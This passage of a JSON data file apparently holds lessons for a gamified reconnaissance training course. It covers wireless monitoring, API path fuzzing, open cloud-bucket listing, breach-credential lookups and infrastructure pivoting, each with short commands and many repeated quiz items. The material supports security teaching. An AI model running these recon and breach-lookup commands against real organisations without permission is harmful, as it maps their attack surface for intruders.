scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-wireless","cat":"Reconnaissance","title":"Wireless Recon","diff":2,"xp":150,"intro":"Discover and map WiFi networks.","sections":[{"type":"text","content":"Monitor mode reveals SSIDs, encryption, clients, and signal strength."},{"type":"code","lang":"bash","content":"airmon-ng start wlan0\nairodump-ng wlan0mon"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Hidden SSIDs are found by...","opts":["Guessing","Deauthing a client to capture probe requests","DNS lookup","Port scan"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-api-discovery","cat":"Reconnaissance","title":"API Endpoint Discovery","diff":3,"xp":200,"intro":"Find undocumented API endpoints.","sections":[{"type":"text","content":"Fuzz paths and analyze JS for hidden API routes."},{"type":"code","lang":"bash","content":"ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt\ncurl https://api.target.com/swagger.json"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Undocumented APIs are found by...","opts":["Asking devs","Fuzzing paths and analyzing JS","Port scanning","DNS enum"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-passive-dns","cat":"Reconnaissance","title":"Passive DNS Intel","diff":3,"xp":200,"intro":"Historical DNS without touching the target.","sections":[{"type":"text","content":"Passive DNS databases record every resolution observed globally."},{"type":"code","lang":"bash","content":"curl -s 'https://api.securitytrails.com/v1/domain/target.com/subdomains' -H 'apikey: KEY'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Passive DNS reveals...","opts":["Vulnerabilities","Historical resolutions and infrastructure changes","Passwords","Source code"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-asn-mapping","cat":"Reconnaissance","title":"ASN & IP Range Mapping","diff":3,"xp":200,"intro":"Map all IPs owned by the target.","sections":[{"type":"text","content":"Organizations own ASNs containing their IP ranges."},{"type":"code","lang":"bash","content":"curl -s https://api.bgpview.io/asn/AS12345/prefixes | jq '.data.ipv4_prefixes[].prefix'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"An ASN identifies...","opts":["A website","An organization's IP ranges","A DNS server","A firewall"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cloud-enum","cat":"Reconnaissance","title":"Multi-Cloud Enumeration","diff":3,"xp":200,"intro":"Discover assets across AWS, Azure, GCP.","sections":[{"type":"text","content":"Enterprises use multiple clouds with forgotten assets."},{"type":"code","lang":"bash","content":"# AWS S3\naws s3 ls s3://target-backup --no-sign-request\n# Azure\ncurl https://target.blob.core.windows.net/public?restype=container&comp=list\n# GCP\ncurl https://storage.googleapis.com/target-data/"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Multi-cloud enum finds...","opts":["Vulnerabilities","Forgotten assets across providers","Passwords","Source code"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-dark-web","cat":"Reconnaissance","title":"Dark Web OSINT","diff":3,"xp":200,"intro":"Search dark web for target intel.","sections":[{"type":"text","content":"Dark web forums contain leaked databases and stolen credentials."},{"type":"code","lang":"bash","content":"spiderfoot -s target.com -m sfp_darksearch\nh8mail -t @target.com --breach-comp"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Dark web monitoring finds...","opts":["Vulnerabilities","Leaked credentials and breach data","Server locations","Network topology"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-threat-landscape","cat":"Reconnaissance","title":"Threat Landscape Analysis","diff":4,"xp":250,"intro":"Combine OSINT, dark web, and threat intel for risk assessment.","sections":[{"type":"text","content":"Go beyond technical recon: monitor dark web, track APT groups, assess security maturity."},{"type":"code","lang":"bash","content":"spiderfoot -s target.com -m all\n# Check: bug bounty program? SOC2? Public incidents?"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Threat landscape combines...","opts":["Port scanning only","OSINT, dark web, threat intel, and maturity assessment","Vuln scanning only","Phishing only"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-covert-infra","cat":"Reconnaissance","title":"Covert Infrastructure Discovery","diff":4,"xp":300,"intro":"Find attacker infrastructure from IOCs.","sections":[{"type":"text","content":"Pivot from known IOCs to map the attacker's full infrastructure."},{"type":"code","lang":"bash","content":"# Pivot from C2 IP via passive DNS, SSL cert fingerprint, WHOIS patterns\ncensys search 'services.tls.certificates.leaf.fingerprint_sha256:HASH'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Infrastructure pivoting starts from...","opts":["Random IPs","Known IOCs expanding outward","Google search","Social media"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning 